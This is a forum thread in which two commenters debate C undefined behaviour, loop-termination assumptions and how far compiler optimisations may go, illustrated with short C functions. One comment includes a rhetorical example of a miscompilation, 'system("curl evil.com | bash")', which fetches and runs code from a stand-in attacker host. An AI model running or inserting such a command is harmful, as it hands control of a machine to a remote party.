BTW, what do you think of the suggested text I offered near the top of this thre...

a1369209993 · on April 17, 2020

> that UB represents a waiver of the Standard's jurisdiction for the purpose of allowing implementations to best serve their intended purposes?

This won't work because defective implementations will just claim that their intended purpose is to do [whatever emergent behaviour that implementation produces], or to generate the fastest code possible regardless of whether that code bears any relation to what the programmer asked for.

> As a simple example, instead of saying "a compiler may assume that all loops with non-constant conditions will terminate"

This is actually completely unneeded, even for optimisation. If a side effect can be hoisted out of a loop at all, it can be hoisted regardless of whether the loop terminates. If the code (called from) inside the loop can (legally) observe the side effect, then it can't be hoisted even if the loop does always terminate. If code outside the loop observes the side effect, then either the loop terminates (and whatever lets you hoist terminating-loop side effects applies) or the code outside the loop is never executed (and thus can't observe any side effects, correct or incorrect).

flatfinger · on April 17, 2020

> This won't work because defective implementations will just claim that their intended purpose is to do [whatever emergent behaviour that implementation produces], or to generate the fastest code possible regardless of whether that code bears any relation to what the programmer asked for.

I would have no qualm with the way clang and gcc process various constructs if they were to explicitly state that its maintainers make no effort to make their optimizer suitable for any tasks involving the receipt of untrustworthy input. Instead, however, they claim that their optimizers are suitable for general-purpose use, despite the fact that their behavior isn't reliably suitable for many common purposes.

> This is actually completely unneeded, even for optimisation.

Consider the following function:

    unsigned long long test(unsigned long long x, int mode)
    {
      do
        x = slow_function_no_side_effects();
      while(x > 1);
      if (mode)
        return 1;
      else
        return x;
    }

Suppose the function is passed a value of "x" which would get caught in a cycle that never hits zero or one, but "mode" is 1. If the code is processed by performing every individual step in order, the function would never return. The rule in C11 is designed to avoid requiring that generated code compute the value of x when its only possible effect on the program's execution would be to prevent the execution of code that doesn't depend on its value.

Suppose the most important requirement that function test() must meet is that it must never return 1 unless mode is 1, or the iteration on x would yield 1 before it yields zero; returning 1 in any other cases would cause the computer's speaker to start playing Barney's "I love you" song, and while looping endlessly would be irksome, it would be less bad than Barney's singing. If a compiler determines that slow_function_no_side_effects() will never return an even number, should it be entitled to generate code that will return 1 when mode is zero, without regard for whether the loop actually completes?

I would think it reasonable for a compiler to defer/skip the computation of x in cases where mode is 1, or for a compiler that can tell that "x" will never be an even number to generate code that, after ensuring that the loop will actually terminate, would unconditionally return 1. Requiring that the programmer write extra code to ensure that the function not return 1 in cases where mode is zero but the loop doesn't terminate would defeat the purpose of "optimization".

a1369209993 · on April 17, 2020

Do you mean `x = slow_function_no_side_effects( x );`? Because if slow_function_no_side_effects really doesn't have side effects, then your version is equivalent to:

  x = slow_function_no_side_effects(); /* only once */
  if(x > 1) for(;;) { /* infinite loop */ }
  return mode ? 1 : x;

That said, I suppose it might be reasonable to explicitly note that a optimiser is allowed to make a program or subroutine complete in less time than it otherwise would, even that reduces the execution time from infinite to finite. That doesn't imply inferring any new facts about the program - either loop termination or otherwise - though. On the other hand it might be better to not allow that; you could make a case that the optimisation you describe is a algorithmic change, and if the programmer wants better performance, they need to write:

  unsigned long long test(unsigned long long x, int mode)
    {
    if(mode) return 1; /* early exit */
    do x = slow_function_no_side_effects(x);
    while(x > 1);
    return x;
    }

, just the same as if they wanted their sorting algorithm to complete in linear time on already-sorted inputs.

flatfinger · on April 18, 2020

Yeah, I meant `slow_function_no_side_effects(x)`. My point is that there's a huge difference between saying that a compiler need not treat a loop as sequenced with regard to outside code if none of the operations therein are likewise sequenced, versus saying that if a loop without side effects fails to terminate, compiler writers should regard all imaginable actions the program could perform as equally acceptable.

In a broader sense, I think the problem is that the authors of the Standard have latched onto the idea that optimizations must not be observable unless a program invokes Undefined Behavior, and consequently any action that would make the effects of an optimization visible must be characterized as UB.

I think it would be far more useful to recognize that optimizations may, on an opt-in or opt-out basis, be allowed to do various things whose effects would be observable, and correct programs that would allow such optimizations must work correctly for any possible combination of effects. Consider the function:

    struct blob { uint16_t a[100]; } x,y,z;

    void test1(int *dat, int n)
    {
      struct blob temp;
      for (int i=0; i<n; i++)
        temp.a[i] = i;
      x=temp;
      y=temp;

    }
    void test2(void)
    {
      int indices[] = {1,0};
      test1(indices, 2);
      z=x;
    }

Should the behavior of test2() be defined despite the fact that `temp` is not fully written before it is copied to `x` and `y`? What if anything should be guaranteed about the values of `x.a[2..99]`, `y.a[2..99]`, and `z.a[2..99]`?

While I would allow programmer to include directives mandating more precise behavior or allowing less precise behavior, I think the most useful set of behavioral guarantees would allow those elements of `x` and `y` to hold arbitrarily different values, but that `x` and `z` would match. My rationale would be that a programmer who sees `x` and `y` assigned from `temp` would be able to see where `temp` was created, and would be able to see that some parts of it might not have been written. If the programmer cared about ensuring that the parts of `x` and `y` corresponding to the unwritten parts matched, there would be many ways of doing that. If the programmer fails to do any of those things, it's likely because the programmer doesn't care about those values.

The programmer of function `test2()`, however, would generally have no way of knowing whether any part of `x` might hold something that won't behave as some possibly-meaningless number. Further, there's no practical way that the author of `test2` could ensure anything about the parts of `x` corresponding to parts of `temp` that don't be written. Thus, a compiler should not make any assumptions about whether a programmer cares about whether `z.a[2..99]` match `x.a[2..99]`.

A compiler's decision to optimize out assignments to `x[2..99]` and `y[2..99]` may be observable, but if code would not, in fact, care about whether `x[2..99]` and `y[2..99]` match, the fact that the optimization may cause the arrays to hold different Unspecified values should not affect any other aspect of program execution.

a1369209993 · on April 19, 2020

> there's a huge difference between saying that a compiler need not treat a loop as sequenced with regard to outside code if none of the operations therein are likewise sequenced, versus saying that if a loop without side effects fails to terminate, compiler writers should regard all imaginable actions the program could perform as equally acceptable.

Yes, definitely true. It's debatable whether it's okay for a compiler to rewrite code as in second example at https://news.ycombinator.com/item?id=22903396 , but it is not debatable that rewriting it as with anything equivalent to:

  if(x > 1 && x == slow_function_no_side_effects(x))
    { system("curl evil.com | bash"); }

is a compiler bug, undefined behaviour be damned.

> that the authors of the Standard have latched onto the idea that optimizations must not be observable unless a program invokes Undefined Behavior

I don't know if this quite characterizes the actual reasoning, but it does seem like a good summary of the overall situation, with "we might do x0 or x1, so x is undefined behaviour" ==> "x is undefined, so we'll do x79, even though we know that's horrible and obviously wrong".

> I think the most useful set of behavioral guarantees would allow those elements of `x` and `y` to hold arbitrarily different values, but that `x` and `z` would match.

Actually, I'm not sure that makes sense; your code is equivalent to:

  struct blob { uint16_t a[100]; } x,y,z;
  
  void test2(void)
    {
    int indices[] = {1,0};
    ; {
      int* dat = indices;
      int n = 2;
      ; {
        struct blob temp;
        for(int i=0; i<n; i++) temp.a[i] = i;
        /* should that be dat[i] ? */
        x=temp;
        y=temp;
        }
      }
    z=x;
    }

I don't think it makes sense to treat x=temp differently from z=x. Maybe if you treat local variables (temp) differently from global variables (x,y,z) but that seems brittle. (What happens if x,y,z are moved inside test2? What if temp is moved out? Does accessing some or all of them through pointers change things?)

flatfinger · on April 19, 2020

The indent is getting rather crazy on this thread; I'll reply further up-thread so as to make the indent less crazy.

flatfinger · on April 19, 2020

Replying to the code [discussed deeper in this sub-thread]:

    struct blob { uint16_t a[100]; } x,y,z;
  
    void test2(void)
    {
      int indices[] = {1,0};
      {
        int* dat = indices;
        int n = 2;
        {
          struct blob temp;
          for(int i=0; i<n; i++) 
            temp.a[dat[i]] = i; // This is what I'd meant
          x=temp;
          y=temp;
        }
        z=x;
      }

The rewrite sequence I would envision would be:

    struct blob { uint16_t a[100]; } x,y,z;
  
    void test2(void)
    {
      int indices[] = {1,0};
      {
        int* dat = indices;
        int n = 2;
        {
          struct blob temp1 = x; // Allowed initial value
          struct blob temp2 = y; // Allowed initial value
          for(int i=0; i<n; i++)
          {
            temp1.a[dat[i]] = i;
            temp2.a[dat[i]] = i;
          }
          x=temp1;
          y=temp2;
        }
        z=x;
      }

Compilers may replace an automatic object whose address is not observable with two objects, provided that anything that is written to one will be written to the other before the latter is examined (if it ever is). Such a possibility is the reason why automatic objects which are written between "setjmp" and "longjmp" must be declared "volatile".

If one allows a compiler to split "temp" into two objects without having to pre-initialize the parts that hold Indeterminate Value, that may allow more efficient code generation than would be possible if either "temp" was regarded as holding Unspecified Value, or if copying a partially-initialized object as classified as "modern-style Undefined Behavior", making it necessary for programmers to manually initialize entire structures, including parts whose values would otherwise not observably affect program execution.

The optimization benefits of attaching loose semantics to objects of automatic duration whose address is not observable are generally greater than the marginal benefits of attaching those semantics to all objects. The risks, however, are relatively small since everything that could affect the objects would be confined to a single function (it an object's address is passed into another function, its address would be observable during the execution of that function).

BTW, automatic objects whose address isn't taken have behaved somewhat more loosely than static objects even in compilers that didn't optimized aggressively. Consider, for example:

    volatile unsigned char x,y;
    int test(int dummy, int mode)
    {
      register unsigned char result;
      if (mode & 1) result = x;
      if (mode & 2) result = y;
      return result;
    }

On many machines, if an attempt to read an uninitialized automatic object whose address isn't taken is allowed to behave weirdly, the most efficient possible code for this function would allocate an "int"-sized register for "result", even though it's only an 8-bit type, do a sign-extending load from `x` and/or `y` if needed, and return whatever happens to be in that register. That would not be a complicated optimization; in fact, it's a simple enough optimization that even a single-shot compiler might be able to do it. It would, however, have the weird effect of allowing the uninitialized "result" object of type "unsigned char" to hold a value outside the result 0..255.

Should a compiler be required to initialize "result" in that situation, or should programmers be required to allow for the possibility that if they don't initialize an automatic object it might behave somewhat strangely?

a1369209993 · on April 19, 2020

  >   temp.a[dat[i]] = i; // This is what I'd meant

I see.

  >   struct blob temp1 = x; // Allowed initial value

With, I presume, a eye toward further producing:

  x.a[dat[i]] = i;
  y.a[dat[i]] = i;

?

> Compilers may replace an automatic object whose address is not observable with two objects,

That makes sense.

> do a sign-extending load from `x` and/or `y`

I assume you mean zero-extending; otherwise `x=255` would result in `result=-1`, which is clearly wrong.

> Should a compiler be required to initialize "result" in that situation, or should programmers be required to allow for the possibility that if they don't initialize an automatic object it might behave somewhat strangely?

Of course not. Result (assuming mode&3 == 0) is undefined, and behaviour characteristic of the environment is that result (aka eg eax) can hold any (say) 32-bit value (whether that's 0..FFFF'FFFF or -8000'0000..7FFF'FFFF depends on what operations are applied, but `int` suggests the latter).

None of this involves that the compiler infering objective (and frequently false) properties of the input program (such as "this loop will terminate" or "p != NULL"), though.

flatfinger · on April 19, 2020

> With, I presume, a eye toward further producing: x.a[dat[i]] = i; y.a[dat[i]] = i;

Bingo.

> I assume you mean zero-extending; otherwise `x=255` would result in `result=-1`, which is clearly wrong.

Naturally.

> None of this involves that the compiler infering objective (and frequently false) properties of the input program (such as "this loop will terminate" or "p != NULL"), though.

Thus the need to use an abstraction model which allows optimizations to alter observable aspects of a program whose behavior is, generally, defined. I wouldn't describe such things as "behavior characteristic of the environment", though the environment would affect the ways in which the effects of optimizations might be likely to manifest themselves.

Note that programs intended for different tasks on different platforms will benefit from slightly--but critically--different abstraction models, and there needs to be a way for programs to specify when deviations from the "load/store machine model" which would normally be acceptable, aren't. For example, there should be a way of indicating that a program requires that automatic objects always behave as though initialized with Unspecified rather than Indeterminate Value.

A good general-purpose abstraction model, however, should allow a compiler to make certain assumptions about the behaviors of constructs, or substitute alternative constructs whose behaviors would be allowed to differ, but would not allow a compiler to make assumptions about the behaviors of constructs it has changed to violate them.

Consider, for example:

    typedef void proc(int);  // Ever seen this shorthand for prototypes?
    proc do_something1, do_something2, do_something3;

    void test2(int z)
    {
      if (z < 60000) do_something3(z);
    }

    int q;
    void test1(int x)
    {
      q = x*60000/60000;
      if (q < 60000) do_something1(q);
      int y = x*60000/60000;
      if (y < 60000) do_something2(y);
      test2(y);
    }

Under a good general-purpose model, a compiler could generate code that could never set q to a value greater than INT_MAX/60000, and a 32-bit compiler that did so could assume that q's value would always be in range and thus omit the comparison. A compiler could also generate code that would simply set q to x, but would forfeit the right to assume that it couldn't be greater than INT_MAX/60000.

There could be optimization value in allowing a compiler to treat automatic objects "symbolically", allowing the second assignment/test combination to become:

      if (x*60000/60000 < 60000) 
        do_something2(x*60000/60000);

even though the effect of the substituted expression might not be consistent. I wouldn't favor allowing inconsistent substitutions by default, but would favor having a means of waiving normal behavioral guarantees against them for local automatic objects whose address is not taken. On the other hand, there would need to be an operator which, when given an operand with a non-determinisitic value, would choose in Unspecified fashion from among the possibilities; to minimize security risks that could be posed by such values, I would say that function arguments should by default behave as though passed through that operator.

The guiding principle I would use in deciding that the value substitution would be reasonable when applied to y but not q or z would be that a programmer would be able to see how y's value is assigned, and see that it could produce something whose behavior would be "unusual", but a programmer looking at test2() would have no reason to believe such a thing about z.

a1369209993 · on April 19, 2020

> I wouldn't describe such things as "behavior characteristic of the environment",

`result` being a 32-bit integer (register) of dubious signedness is behaviour characteristic of the environment, which the implementation is sometimes obliged to paper over (eg with `and eax FF`) in the interests of being able to write correct code.

> A good general-purpose abstraction model, however, should allow a compiler to make certain assumptions about the behaviors of constructs, or substitute alternative constructs whose behaviors would be allowed to differ, but would not allow a compiler to make assumptions about the behaviors of constructs it has changed to violate them.

> Under a good general-purpose model, a compiler could generate code that could never set q to a value greater than INT_MAX/60000, and a 32-bit compiler that did so could assume that q's value would always be in range and thus omit the comparison. A compiler could also generate code that would simply set q to x, but would forfeit the right to assume that it couldn't be greater than INT_MAX/60000.

Yes, clearly.

> I wouldn't favor allowing inconsistent substitutions by default, but would favor having a means of waiving normal behavioral guarantees

In that case, I'm not sure what we're even arguing about; the language standard might or might not standardize a way of specifying said waiver, but as long as it's not lumped in with -On or -std=blah that are necessary to get a proper compiler, it has no bearing on real-world programmers that're just trying get working code. Hell, I'd welcome a -Ounsafe or whatever, just to see what sort of horrible mess it makes, as long -Ono-unsafe exists and is the default.

flatfinger · on April 19, 2020

> Yes, clearly.

Unfortunately, the C Standard doesn't specify an abstraction model that is amenable to the optimization of usable programs.

> In that case, I'm not sure what we're even arguing about; the language standard might or might not standardize a way of specifying said waiver, but as long as it's not lumped in with -On or -std=blah that are necessary to get a proper compiler, it has no bearing on real-world programmers that're just trying get working code. Hell, I'd welcome a -Ounsafe or whatever, just to see what sort of horrible mess it makes, as long -Ono-unsafe exists and is the default.

The only reason for contention between compiler writers and programmers is a desire to allow compilers to optimized based upon the assumption that a program won't do certain things. The solution to that contention would be to have a means of inviting optimizations in cases where they would be safe and useful, analogous to what `restrict` would be if the definition of "based upon" wasn't so heinously broken.

a1369209993 · on April 20, 2020

> to allow compilers to optimized based upon the assumption that a program won't do certain things.

Emphasis mine. This is always wrong. Correct (and thus legitimate-to-optize-based-on) knowledge of program behavior is derived by actually looking at what the program actually does, eg "p can never be NULL because if is was, a previous jz/bz/cmovz pc would have taken us somewhere else"[0]. Optimising "based on" undefined behaviour is only legitimate to the extent that it consists of choosing the most convenient option from the space of concrete realizations of particular undefined behaviour that are consistent with the environment (especially the hardware).

0: Note that I don't say "a previous if-else statement", because when we say "p can never be NULL", we're already in the process of looking for reasons to remove if-else statements.

flatfinger · on April 20, 2020

There are many cases where accommodating weird corner cases would be expensive, and would only be useful for some kinds of program. Requiring that all implementations intended for all kinds of task handle corner cases that won't be relevant for most kinds of tasks would needlessly degrade efficiency. The problem is that there's no way for programs to specify which corner cases they do or don't need.

a1369209993 · on April 20, 2020

> Requiring that all implementations intended for all kinds of task handle corner cases that won't be relevant for most kinds of tasks would needlessly degrade efficiency.

Yes, that's what undefined behaviour is for. Eg requiring that implementations handle integer overflow needlessly degrades efficiency of the overwhelming majority of tasks where integers do not if fact overflow.

> The problem is that there's no way for programs to specify which corner cases they do or don't need.

Wait, are you just asking (the situationally appropriate equivalent of) `(int32_t)((uint32_t)x+(uint32_t)y)` and/or `#pragma unsafe assert(p!=NULL)`? Because while it's a shame the standard doesn't provide standardized ways to specify these things (as I admitted upthread) programs are prefectly capable of using the former, and implementations are perfectly capable of supporting the latter; I'm just arguing that the defaults should be sensible.

flatfinger · on April 21, 2020

In many cases, the semantics programmers would require are much looser than anything provided for by the Standard. For example, if a programmer requires an expression that computes (x \* y / z) when there is no overflow, and computes an arbitrary value with no side effects when there is an overflow, a programmer could write the expression with unsigned and signed casting operators, but that would force a compiler generate machine code to actually perform the multiplication and division even in cases where it knows that y will always be twice z. Under "yield any value with no side effects" semantics, a compiler could replace the expression with (x \* 2), which would be much faster to compute.